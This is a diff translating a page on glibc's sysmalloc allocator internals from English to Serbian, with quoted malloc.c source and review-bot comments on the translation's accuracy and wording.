/* its size */ - size_t pagesize = GLRO (dl_pagesize); - bool tried_mmap = false; +size_t pagesize = GLRO (dl_pagesize); +bool tried_mmap = false; - /* - If have mmap, and the request size meets the mmap threshold, and - the system supports mmap, and there are few enough currently - allocated mmapped regions, try to directly map this request - rather than expanding top. - */ +/* +If have mmap, and the request size meets the mmap threshold, and +the system supports mmap, and there are few enough currently +allocated mmapped regions, try to directly map this request +rather than expanding top. +*/ - if (av == NULL - || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold) - && (mp_.n_mmaps < mp_.n_mmaps_max))) - { - char *mm; - if (mp_.hp_pagesize > 0 && nb >= mp_.hp_pagesize) - { - /* There is no need to issue the THP madvise call if Huge Pages are - used directly. */ - mm = sysmalloc_mmap (nb, mp_.hp_pagesize, mp_.hp_flags, av); - if (mm != MAP_FAILED) - return mm; - } - mm = sysmalloc_mmap (nb, pagesize, 0, av); - if (mm != MAP_FAILED) - return mm; - tried_mmap = true; - } +if (av == NULL +|| ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold) +&& (mp_.n_mmaps < mp_.n_mmaps_max))) +{ +char *mm; +if (mp_.hp_pagesize > 0 && nb >= mp_.hp_pagesize) +{ +/* There is no need to issue the THP madvise call if Huge Pages are +used directly. */ +mm = sysmalloc_mmap (nb, mp_.hp_pagesize, mp_.hp_flags, av); +if (mm != MAP_FAILED) +return mm; +} +mm = sysmalloc_mmap (nb, pagesize, 0, av); +if (mm != MAP_FAILED) +return mm; +tried_mmap = true; +} - /* There are no usable arenas and mmap also failed. */ - if (av == NULL) - return 0; +/* There are no usable arenas and mmap also failed. */ +if (av == NULL) +return 0; ``` -
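Review bot: `preostali mmaps su dozvoljeni` does not convey the condition; the code checks `mp_.n_mmaps < mp_.n_mmaps_max`, i.e. the count of live mmapped regions is below the configured maximum, and "too big" means `nb >= mp_.mmap_threshold`. The summary also skips two visible branches worth a sentence each: with huge pages configured (`mp_.hp_pagesize > 0 && nb >= mp_.hp_pagesize`) `sysmalloc_mmap` is first tried with `mp_.hp_pagesize` and `mp_.hp_flags`, and if `av == NULL` and the mmap attempt also failed, the function returns 0 (`/* There are no usable arenas and mmap also failed. */`), which is the path a caller sees as a NULL from `malloc`.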
-### sysmalloc checks +### sysmalloc provere -It starts by getting old top chunk information and checking that some of the following condations are true: +Započinje dobijanjem informacija o starom top chunk-u i proverava da li su neki od sledećih uslova tačni: -- The old heap size is 0 (new heap) -- The size of the previous heap is greater and MINSIZE and the old Top is in use -- The heap is aligned to page size (0x1000 so the lower 12 bits need to be 0) +- Stara veličina heap-a je 0 (novi heap) +- Veličina prethodnog heap-a je veća od MINSIZE i stari Top je u upotrebi +- Heap je poravnat na veličinu stranice (0x1000, tako da donjih 12 bita treba da budu 0) -Then it also checks that: +Takođe proverava da li: -- The old size hasn't enough space to create a chunk for the requested size +- Stara veličina nema dovoljno prostora za kreiranje chunk-a za traženu veličinu
-sysmalloc checks - +sysmalloc provere ```c /* Record incoming configuration of top */ - old_top = av->top; - old_size = chunksize (old_top); - old_end = (char *) (chunk_at_offset (old_top, old_size)); +old_top = av->top; +old_size = chunksize (old_top); +old_end = (char *) (chunk_at_offset (old_top, old_size)); - brk = snd_brk = (char *) (MORECORE_FAILURE); +brk = snd_brk = (char *) (MORECORE_FAILURE); - /* - If not the first time through, we require old_size to be - at least MINSIZE and to have prev_inuse set. - */ +/* +If not the first time through, we require old_size to be +at least MINSIZE and to have prev_inuse set. +*/ - assert ((old_top == initial_top (av) && old_size == 0) || - ((unsigned long) (old_size) >= MINSIZE && - prev_inuse (old_top) && - ((unsigned long) old_end & (pagesize - 1)) == 0)); +assert ((old_top == initial_top (av) && old_size == 0) || +((unsigned long) (old_size) >= MINSIZE && +prev_inuse (old_top) && +((unsigned long) old_end & (pagesize - 1)) == 0)); - /* Precondition: not enough current space to satisfy nb request */ - assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE)); +/* Precondition: not enough current space to satisfy nb request */ +assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE)); ``` -
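Review bot: `proverava da li su neki od sledećih uslova tačni` misreads the assertion. It is `(old_top == initial_top (av) && old_size == 0)` OR all three of `old_size >= MINSIZE`, `prev_inuse (old_top)` and a page-aligned `old_end`, not "some of the following"; the bullet list should be restructured as one condition or the other group. The third bullet, `0x1000, tako da donjih 12 bita treba da budu 0`, hard-codes the page size, but the mask is `pagesize - 1` with `pagesize = GLRO (dl_pagesize)`, so on 16K or 64K page systems more bits must be zero, and what must be aligned is the end of the old top (`old_end = (char *) (chunk_at_offset (old_top, old_size))`), not "the heap". The text calls these checks, but they are `assert`s: a failure aborts with an assertion message quoting the expression, not with a `malloc():` string like the `corrupted top size` check in the previous section, which matters for anyone matching on crash output.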
-### sysmalloc not main arena +### sysmalloc ne glavna arena -It'll first try to **extend** the previous heap for this heap. If not possible try to **allocate a new heap** and update the pointers to be able to use it.\ -Finally if that didn't work, try calling **`sysmalloc_mmap`**. +Prvo će pokušati da **proširi** prethodni heap za ovaj heap. Ako to nije moguće, pokušaće da **alokira novi heap** i ažurira pokazivače kako bi mogli da ga koriste.\ +Na kraju, ako to nije uspelo, pokušaće da pozove **`sysmalloc_mmap`**.
-sysmalloc not main arena - +sysmalloc ne glavna arena ```c if (av != &main_arena) - { - heap_info *old_heap, *heap; - size_t old_heap_size; +{ +heap_info *old_heap, *heap; +size_t old_heap_size; - /* First try to extend the current heap. */ - old_heap = heap_for_ptr (old_top); - old_heap_size = old_heap->size; - if ((long) (MINSIZE + nb - old_size) > 0 - && grow_heap (old_heap, MINSIZE + nb - old_size) == 0) - { - av->system_mem += old_heap->size - old_heap_size; - set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top) - | PREV_INUSE); - } - else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad))) - { - /* Use a newly allocated heap. */ - heap->ar_ptr = av; - heap->prev = old_heap; - av->system_mem += heap->size; - /* Set up the new top. */ - top (av) = chunk_at_offset (heap, sizeof (*heap)); - set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE); +/* First try to extend the current heap. */ +old_heap = heap_for_ptr (old_top); +old_heap_size = old_heap->size; +if ((long) (MINSIZE + nb - old_size) > 0 +&& grow_heap (old_heap, MINSIZE + nb - old_size) == 0) +{ +av->system_mem += old_heap->size - old_heap_size; +set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top) +| PREV_INUSE); +} +else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad))) +{ +/* Use a newly allocated heap. */ +heap->ar_ptr = av; +heap->prev = old_heap; +av->system_mem += heap->size; +/* Set up the new top. */ +top (av) = chunk_at_offset (heap, sizeof (*heap)); +set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE); - /* Setup fencepost and free the old top chunk with a multiple of - MALLOC_ALIGNMENT in size. */ - /* The fencepost takes at least MINSIZE bytes, because it might - become the top chunk again later. Note that a footer is set - up, too, although the chunk is marked in use. 
*/ - old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK; - set_head (chunk_at_offset (old_top, old_size + CHUNK_HDR_SZ), - 0 | PREV_INUSE); - if (old_size >= MINSIZE) - { - set_head (chunk_at_offset (old_top, old_size), - CHUNK_HDR_SZ | PREV_INUSE); - set_foot (chunk_at_offset (old_top, old_size), CHUNK_HDR_SZ); - set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA); - _int_free (av, old_top, 1); - } - else - { - set_head (old_top, (old_size + CHUNK_HDR_SZ) | PREV_INUSE); - set_foot (old_top, (old_size + CHUNK_HDR_SZ)); - } - } - else if (!tried_mmap) - { - /* We can at least try to use to mmap memory. If new_heap fails - it is unlikely that trying to allocate huge pages will - succeed. */ - char *mm = sysmalloc_mmap (nb, pagesize, 0, av); - if (mm != MAP_FAILED) - return mm; - } - } +/* Setup fencepost and free the old top chunk with a multiple of +MALLOC_ALIGNMENT in size. */ +/* The fencepost takes at least MINSIZE bytes, because it might +become the top chunk again later. Note that a footer is set +up, too, although the chunk is marked in use. */ +old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK; +set_head (chunk_at_offset (old_top, old_size + CHUNK_HDR_SZ), +0 | PREV_INUSE); +if (old_size >= MINSIZE) +{ +set_head (chunk_at_offset (old_top, old_size), +CHUNK_HDR_SZ | PREV_INUSE); +set_foot (chunk_at_offset (old_top, old_size), CHUNK_HDR_SZ); +set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA); +_int_free (av, old_top, 1); +} +else +{ +set_head (old_top, (old_size + CHUNK_HDR_SZ) | PREV_INUSE); +set_foot (old_top, (old_size + CHUNK_HDR_SZ)); +} +} +else if (!tried_mmap) +{ +/* We can at least try to use to mmap memory. If new_heap fails +it is unlikely that trying to allocate huge pages will +succeed. */ +char *mm = sysmalloc_mmap (nb, pagesize, 0, av); +if (mm != MAP_FAILED) +return mm; +} +} ``` -
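Review bot: `proširi prethodni heap za ovaj heap` does not say what gets extended; the code grows the heap that contains the old top (`old_heap = heap_for_ptr (old_top)`) by `MINSIZE + nb - old_size` through `grow_heap`, and only if that fails creates one with `new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)`. The prose also drops the guard on the final fallback: `sysmalloc_mmap` runs only under `else if (!tried_mmap)`, i.e. when the mmap path at the top of `sysmalloc` was not already attempted. The fencepost logic is left out entirely and deserves a sentence, since it is the part that matters for heap-exploitation notes: on the new-heap path the old top is shrunk (`old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK`), a zero-size fencepost and a `CHUNK_HDR_SZ` chunk are written after it, and when at least `MINSIZE` remains the old top is released with `_int_free (av, old_top, 1)`. The heading `sysmalloc ne glavna arena` is ungrammatical; `sysmalloc: arena koja nije glavna` or `sysmalloc (ne-glavna arena)` reads naturally.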
-### sysmalloc main arena +### sysmalloc glavna arena -It starts calculating the amount of memory needed. It'll start by requesting contiguous memory so in this case it'll be possible to use the old memory not used. Also some align operations are performed. +Počinje da izračunava količinu potrebne memorije. Počeće tako što će zatražiti kontiguitetnu memoriju, tako da će u ovom slučaju biti moguće koristiti staru neiskorišćenu memoriju. Takođe se vrše neke operacije poravnanja.
-sysmalloc main arena - +sysmalloc glavna arena ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2665C1-L2713C10 - else /* av == main_arena */ +else /* av == main_arena */ - { /* Request enough space for nb + pad + overhead */ - size = nb + mp_.top_pad + MINSIZE; +{ /* Request enough space for nb + pad + overhead */ +size = nb + mp_.top_pad + MINSIZE; - /* - If contiguous, we can subtract out existing space that we hope to - combine with new space. We add it back later only if - we don't actually get contiguous space. - */ +/* +If contiguous, we can subtract out existing space that we hope to +combine with new space. We add it back later only if +we don't actually get contiguous space. +*/ - if (contiguous (av)) - size -= old_size; +if (contiguous (av)) +size -= old_size; - /* - Round to a multiple of page size or huge page size. - If MORECORE is not contiguous, this ensures that we only call it - with whole-page arguments. And if MORECORE is contiguous and - this is not first time through, this preserves page-alignment of - previous calls. Otherwise, we correct to page-align below. - */ +/* +Round to a multiple of page size or huge page size. +If MORECORE is not contiguous, this ensures that we only call it +with whole-page arguments. And if MORECORE is contiguous and +this is not first time through, this preserves page-alignment of +previous calls. Otherwise, we correct to page-align below. +*/ #ifdef MADV_HUGEPAGE - /* Defined in brk.c. */ - extern void *__curbrk; - if (__glibc_unlikely (mp_.thp_pagesize != 0)) - { - uintptr_t top = ALIGN_UP ((uintptr_t) __curbrk + size, - mp_.thp_pagesize); - size = top - (uintptr_t) __curbrk; - } - else +/* Defined in brk.c. 
*/ +extern void *__curbrk; +if (__glibc_unlikely (mp_.thp_pagesize != 0)) +{ +uintptr_t top = ALIGN_UP ((uintptr_t) __curbrk + size, +mp_.thp_pagesize); +size = top - (uintptr_t) __curbrk; +} +else #endif - size = ALIGN_UP (size, GLRO(dl_pagesize)); +size = ALIGN_UP (size, GLRO(dl_pagesize)); - /* - Don't try to call MORECORE if argument is so big as to appear - negative. Note that since mmap takes size_t arg, it may succeed - below even if we cannot call MORECORE. - */ +/* +Don't try to call MORECORE if argument is so big as to appear +negative. Note that since mmap takes size_t arg, it may succeed +below even if we cannot call MORECORE. +*/ - if (size > 0) - { - brk = (char *) (MORECORE (size)); - if (brk != (char *) (MORECORE_FAILURE)) - madvise_thp (brk, size); - LIBC_PROBE (memory_sbrk_more, 2, brk, size); - } +if (size > 0) +{ +brk = (char *) (MORECORE (size)); +if (brk != (char *) (MORECORE_FAILURE)) +madvise_thp (brk, size); +LIBC_PROBE (memory_sbrk_more, 2, brk, size); +} ``` -
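Review bot: `kontiguitetnu memoriju` is not a Serbian word; use `kontinuiranu` (or `susednu`) memory. The sentence also hides the arithmetic the block performs: `size = nb + mp_.top_pad + MINSIZE`, reduced by `old_size` when `contiguous (av)` so only the shortfall is requested, then `ALIGN_UP` to the page size or, when `mp_.thp_pagesize != 0`, to the transparent-huge-page boundary measured from `__curbrk`. Worth adding the `if (size > 0)` guard before `MORECORE (size)` too, with the comment's reason (an argument large enough to appear negative is never passed to sbrk), because that is the case where the next section's mmap fallback becomes the only option.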
-### sysmalloc main arena previous error 1 +### sysmalloc glavna arena prethodna greška 1 -If the previous returned `MORECORE_FAILURE`, try agin to allocate memory using `sysmalloc_mmap_fallback` +Ako je prethodno vraćeno `MORECORE_FAILURE`, pokušajte ponovo da alocirate memoriju koristeći `sysmalloc_mmap_fallback`
-sysmalloc main arena previous error 1 - +sysmalloc glavna arena prethodna greška 1 ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2715C7-L2740C10 if (brk == (char *) (MORECORE_FAILURE)) - { - /* - If have mmap, try using it as a backup when MORECORE fails or - cannot be used. This is worth doing on systems that have "holes" in - address space, so sbrk cannot extend to give contiguous space, but - space is available elsewhere. Note that we ignore mmap max count - and threshold limits, since the space will not be used as a - segregated mmap region. - */ +{ +/* +If have mmap, try using it as a backup when MORECORE fails or +cannot be used. This is worth doing on systems that have "holes" in +address space, so sbrk cannot extend to give contiguous space, but +space is available elsewhere. Note that we ignore mmap max count +and threshold limits, since the space will not be used as a +segregated mmap region. +*/ - char *mbrk = MAP_FAILED; - if (mp_.hp_pagesize > 0) - mbrk = sysmalloc_mmap_fallback (&size, nb, old_size, - mp_.hp_pagesize, mp_.hp_pagesize, - mp_.hp_flags, av); - if (mbrk == MAP_FAILED) - mbrk = sysmalloc_mmap_fallback (&size, nb, old_size, MMAP_AS_MORECORE_SIZE, - pagesize, 0, av); - if (mbrk != MAP_FAILED) - { - /* We do not need, and cannot use, another sbrk call to find end */ - brk = mbrk; - snd_brk = brk + size; - } - } +char *mbrk = MAP_FAILED; +if (mp_.hp_pagesize > 0) +mbrk = sysmalloc_mmap_fallback (&size, nb, old_size, +mp_.hp_pagesize, mp_.hp_pagesize, +mp_.hp_flags, av); +if (mbrk == MAP_FAILED) +mbrk = sysmalloc_mmap_fallback (&size, nb, old_size, MMAP_AS_MORECORE_SIZE, +pagesize, 0, av); +if (mbrk != MAP_FAILED) +{ +/* We do not need, and cannot use, another sbrk call to find end */ +brk = mbrk; +snd_brk = brk + size; +} +} ``` -
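Review bot: `pokušajte ponovo da alocirate` is an imperative where the English `try again to allocate` is descriptive, the same person mismatch as in earlier sections. The one-line summary should carry over the point made in the in-code comment: this fallback deliberately ignores `mp_.n_mmaps_max` and `mp_.mmap_threshold` because the mapping becomes the new top rather than a segregated mmapped chunk, huge pages are tried first when `mp_.hp_pagesize > 0`, the plain-page attempt uses `MMAP_AS_MORECORE_SIZE` as its minimum, and on success `snd_brk = brk + size` is set directly since no second `sbrk` call can locate the end of an mmapped region.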
-### sysmalloc main arena continue +### sysmalloc glavna arena nastavak -If the previous didn't return `MORECORE_FAILURE`, if it worked create some alignments: +Ako prethodno nije vratilo `MORECORE_FAILURE`, ako je uspelo, kreirajte neka poravnanja:
-sysmalloc main arena previous error 2 - +sysmalloc glavna arena prethodna greška 2 ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2742 if (brk != (char *) (MORECORE_FAILURE)) - { - if (mp_.sbrk_base == 0) - mp_.sbrk_base = brk; - av->system_mem += size; +{ +if (mp_.sbrk_base == 0) +mp_.sbrk_base = brk; +av->system_mem += size; - /* - If MORECORE extends previous space, we can likewise extend top size. - */ +/* +If MORECORE extends previous space, we can likewise extend top size. +*/ - if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE)) - set_head (old_top, (size + old_size) | PREV_INUSE); +if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE)) +set_head (old_top, (size + old_size) | PREV_INUSE); - else if (contiguous (av) && old_size && brk < old_end) - /* Oops! Someone else killed our space.. Can't touch anything. */ - malloc_printerr ("break adjusted to free malloc space"); +else if (contiguous (av) && old_size && brk < old_end) +/* Oops! Someone else killed our space.. Can't touch anything. */ +malloc_printerr ("break adjusted to free malloc space"); - /* - Otherwise, make adjustments: +/* +Otherwise, make adjustments: - * If the first time through or noncontiguous, we need to call sbrk - just to find out where the end of memory lies. +* If the first time through or noncontiguous, we need to call sbrk +just to find out where the end of memory lies. - * We need to ensure that all returned chunks from malloc will meet - MALLOC_ALIGNMENT +* We need to ensure that all returned chunks from malloc will meet +MALLOC_ALIGNMENT - * If there was an intervening foreign sbrk, we need to adjust sbrk - request size to account for fact that we will not be able to - combine new space with existing space in old_top. +* If there was an intervening foreign sbrk, we need to adjust sbrk +request size to account for fact that we will not be able to +combine new space with existing space in old_top. 
- * Almost all systems internally allocate whole pages at a time, in - which case we might as well use the whole last page of request. - So we allocate enough more memory to hit a page boundary now, - which in turn causes future contiguous calls to page-align. - */ +* Almost all systems internally allocate whole pages at a time, in +which case we might as well use the whole last page of request. +So we allocate enough more memory to hit a page boundary now, +which in turn causes future contiguous calls to page-align. +*/ - else - { - front_misalign = 0; - end_misalign = 0; - correction = 0; - aligned_brk = brk; +else +{ +front_misalign = 0; +end_misalign = 0; +correction = 0; +aligned_brk = brk; - /* handle contiguous cases */ - if (contiguous (av)) - { - /* Count foreign sbrk as system_mem. */ - if (old_size) - av->system_mem += brk - old_end; +/* handle contiguous cases */ +if (contiguous (av)) +{ +/* Count foreign sbrk as system_mem. */ +if (old_size) +av->system_mem += brk - old_end; - /* Guarantee alignment of first new chunk made from this space */ +/* Guarantee alignment of first new chunk made from this space */ - front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK; - if (front_misalign > 0) - { - /* - Skip over some bytes to arrive at an aligned position. - We don't need to specially mark these wasted front bytes. - They will never be accessed anyway because - prev_inuse of av->top (and any chunk created from its start) - is always true after initialization. - */ +front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK; +if (front_misalign > 0) +{ +/* +Skip over some bytes to arrive at an aligned position. +We don't need to specially mark these wasted front bytes. +They will never be accessed anyway because +prev_inuse of av->top (and any chunk created from its start) +is always true after initialization. 
+*/ - correction = MALLOC_ALIGNMENT - front_misalign; - aligned_brk += correction; - } +correction = MALLOC_ALIGNMENT - front_misalign; +aligned_brk += correction; +} - /* - If this isn't adjacent to existing space, then we will not - be able to merge with old_top space, so must add to 2nd request. - */ +/* +If this isn't adjacent to existing space, then we will not +be able to merge with old_top space, so must add to 2nd request. +*/ - correction += old_size; +correction += old_size; - /* Extend the end address to hit a page boundary */ - end_misalign = (INTERNAL_SIZE_T) (brk + size + correction); - correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign; +/* Extend the end address to hit a page boundary */ +end_misalign = (INTERNAL_SIZE_T) (brk + size + correction); +correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign; - assert (correction >= 0); - snd_brk = (char *) (MORECORE (correction)); +assert (correction >= 0); +snd_brk = (char *) (MORECORE (correction)); - /* - If can't allocate correction, try to at least find out current - brk. It might be enough to proceed without failing. +/* +If can't allocate correction, try to at least find out current +brk. It might be enough to proceed without failing. - Note that if second sbrk did NOT fail, we assume that space - is contiguous with first sbrk. This is a safe assumption unless - program is multithreaded but doesn't use locks and a foreign sbrk - occurred between our first and second calls. - */ +Note that if second sbrk did NOT fail, we assume that space +is contiguous with first sbrk. This is a safe assumption unless +program is multithreaded but doesn't use locks and a foreign sbrk +occurred between our first and second calls. 
+*/ - if (snd_brk == (char *) (MORECORE_FAILURE)) - { - correction = 0; - snd_brk = (char *) (MORECORE (0)); - } - else - madvise_thp (snd_brk, correction); - } +if (snd_brk == (char *) (MORECORE_FAILURE)) +{ +correction = 0; +snd_brk = (char *) (MORECORE (0)); +} +else +madvise_thp (snd_brk, correction); +} - /* handle non-contiguous cases */ - else - { - if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ) - /* MORECORE/mmap must correctly align */ - assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0); - else - { - front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK; - if (front_misalign > 0) - { - /* - Skip over some bytes to arrive at an aligned position. - We don't need to specially mark these wasted front bytes. - They will never be accessed anyway because - prev_inuse of av->top (and any chunk created from its start) - is always true after initialization. - */ +/* handle non-contiguous cases */ +else +{ +if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ) +/* MORECORE/mmap must correctly align */ +assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0); +else +{ +front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK; +if (front_misalign > 0) +{ +/* +Skip over some bytes to arrive at an aligned position. +We don't need to specially mark these wasted front bytes. +They will never be accessed anyway because +prev_inuse of av->top (and any chunk created from its start) +is always true after initialization. 
+*/ - aligned_brk += MALLOC_ALIGNMENT - front_misalign; - } - } +aligned_brk += MALLOC_ALIGNMENT - front_misalign; +} +} - /* Find out current end of memory */ - if (snd_brk == (char *) (MORECORE_FAILURE)) - { - snd_brk = (char *) (MORECORE (0)); - } - } +/* Find out current end of memory */ +if (snd_brk == (char *) (MORECORE_FAILURE)) +{ +snd_brk = (char *) (MORECORE (0)); +} +} - /* Adjust top based on results of second sbrk */ - if (snd_brk != (char *) (MORECORE_FAILURE)) - { - av->top = (mchunkptr) aligned_brk; - set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE); - av->system_mem += correction; +/* Adjust top based on results of second sbrk */ +if (snd_brk != (char *) (MORECORE_FAILURE)) +{ +av->top = (mchunkptr) aligned_brk; +set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE); +av->system_mem += correction; - /* - If not the first time through, we either have a - gap due to foreign sbrk or a non-contiguous region. Insert a - double fencepost at old_top to prevent consolidation with space - we don't own. These fenceposts are artificial chunks that are - marked as inuse and are in any case too small to use. We need - two to make sizes and alignments work out. - */ +/* +If not the first time through, we either have a +gap due to foreign sbrk or a non-contiguous region. Insert a +double fencepost at old_top to prevent consolidation with space +we don't own. These fenceposts are artificial chunks that are +marked as inuse and are in any case too small to use. We need +two to make sizes and alignments work out. +*/ - if (old_size != 0) - { - /* - Shrink old_top to insert fenceposts, keeping size a - multiple of MALLOC_ALIGNMENT. We know there is at least - enough space in old_top to do this. - */ - old_size = (old_size - 2 * CHUNK_HDR_SZ) & ~MALLOC_ALIGN_MASK; - set_head (old_top, old_size | PREV_INUSE); +if (old_size != 0) +{ +/* +Shrink old_top to insert fenceposts, keeping size a +multiple of MALLOC_ALIGNMENT. 
We know there is at least +enough space in old_top to do this. +*/ +old_size = (old_size - 2 * CHUNK_HDR_SZ) & ~MALLOC_ALIGN_MASK; +set_head (old_top, old_size | PREV_INUSE); - /* - Note that the following assignments completely overwrite - old_top when old_size was previously MINSIZE. This is - intentional. We need the fencepost, even if old_top otherwise gets - lost. - */ - set_head (chunk_at_offset (old_top, old_size), - CHUNK_HDR_SZ | PREV_INUSE); - set_head (chunk_at_offset (old_top, - old_size + CHUNK_HDR_SZ), - CHUNK_HDR_SZ | PREV_INUSE); +/* +Note that the following assignments completely overwrite +old_top when old_size was previously MINSIZE. This is +intentional. We need the fencepost, even if old_top otherwise gets +lost. +*/ +set_head (chunk_at_offset (old_top, old_size), +CHUNK_HDR_SZ | PREV_INUSE); +set_head (chunk_at_offset (old_top, +old_size + CHUNK_HDR_SZ), +CHUNK_HDR_SZ | PREV_INUSE); - /* If possible, release the rest. */ - if (old_size >= MINSIZE) - { - _int_free (av, old_top, 1); - } - } - } - } - } - } /* if (av != &main_arena) */ +/* If possible, release the rest. */ +if (old_size >= MINSIZE) +{ +_int_free (av, old_top, 1); +} +} +} +} +} +} /* if (av != &main_arena) */ ``` -
### sysmalloc finale -Finish the allocation updating the arena information - +Završite alokaciju ažuriranjem informacija o areni. ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2921C3-L2943C12 if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem)) - av->max_system_mem = av->system_mem; - check_malloc_state (av); +av->max_system_mem = av->system_mem; +check_malloc_state (av); - /* finally, do the allocation */ - p = av->top; - size = chunksize (p); +/* finally, do the allocation */ +p = av->top; +size = chunksize (p); - /* check that one of the above allocation paths succeeded */ - if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) - { - remainder_size = size - nb; - remainder = chunk_at_offset (p, nb); - av->top = remainder; - set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); - set_head (remainder, remainder_size | PREV_INUSE); - check_malloced_chunk (av, p, nb); - return chunk2mem (p); - } +/* check that one of the above allocation paths succeeded */ +if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE)) +{ +remainder_size = size - nb; +remainder = chunk_at_offset (p, nb); +av->top = remainder; +set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0)); +set_head (remainder, remainder_size | PREV_INUSE); +check_malloced_chunk (av, p, nb); +return chunk2mem (p); +} - /* catch all failure paths */ - __set_errno (ENOMEM); - return 0; +/* catch all failure paths */ +__set_errno (ENOMEM); +return 0; ``` - ## sysmalloc_mmap
-sysmalloc_mmap code - +sysmalloc_mmap код ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L2392C1-L2481C2 static void * sysmalloc_mmap (INTERNAL_SIZE_T nb, size_t pagesize, int extra_flags, mstate av) { - long int size; +long int size; - /* - Round up size to nearest page. For mmapped chunks, the overhead is one - SIZE_SZ unit larger than for normal chunks, because there is no - following chunk whose prev_size field could be used. +/* +Round up size to nearest page. For mmapped chunks, the overhead is one +SIZE_SZ unit larger than for normal chunks, because there is no +following chunk whose prev_size field could be used. - See the front_misalign handling below, for glibc there is no need for - further alignments unless we have have high alignment. - */ - if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ) - size = ALIGN_UP (nb + SIZE_SZ, pagesize); - else - size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize); +See the front_misalign handling below, for glibc there is no need for +further alignments unless we have have high alignment. +*/ +if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ) +size = ALIGN_UP (nb + SIZE_SZ, pagesize); +else +size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize); - /* Don't try if size wraps around 0. */ - if ((unsigned long) (size) <= (unsigned long) (nb)) - return MAP_FAILED; +/* Don't try if size wraps around 0. 
*/ +if ((unsigned long) (size) <= (unsigned long) (nb)) +return MAP_FAILED; - char *mm = (char *) MMAP (0, size, - mtag_mmap_flags | PROT_READ | PROT_WRITE, - extra_flags); - if (mm == MAP_FAILED) - return mm; +char *mm = (char *) MMAP (0, size, +mtag_mmap_flags | PROT_READ | PROT_WRITE, +extra_flags); +if (mm == MAP_FAILED) +return mm; #ifdef MAP_HUGETLB - if (!(extra_flags & MAP_HUGETLB)) - madvise_thp (mm, size); +if (!(extra_flags & MAP_HUGETLB)) +madvise_thp (mm, size); #endif - __set_vma_name (mm, size, " glibc: malloc"); +__set_vma_name (mm, size, " glibc: malloc"); - /* - The offset to the start of the mmapped region is stored in the prev_size - field of the chunk. This allows us to adjust returned start address to - meet alignment requirements here and in memalign(), and still be able to - compute proper address argument for later munmap in free() and realloc(). - */ +/* +The offset to the start of the mmapped region is stored in the prev_size +field of the chunk. This allows us to adjust returned start address to +meet alignment requirements here and in memalign(), and still be able to +compute proper address argument for later munmap in free() and realloc(). +*/ - INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */ +INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */ - if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ) - { - /* For glibc, chunk2mem increases the address by CHUNK_HDR_SZ and - MALLOC_ALIGN_MASK is CHUNK_HDR_SZ-1. Each mmap'ed area is page - aligned and therefore definitely MALLOC_ALIGN_MASK-aligned. */ - assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0); - front_misalign = 0; - } - else - front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK; +if (MALLOC_ALIGNMENT == CHUNK_HDR_SZ) +{ +/* For glibc, chunk2mem increases the address by CHUNK_HDR_SZ and +MALLOC_ALIGN_MASK is CHUNK_HDR_SZ-1. Each mmap'ed area is page +aligned and therefore definitely MALLOC_ALIGN_MASK-aligned. 
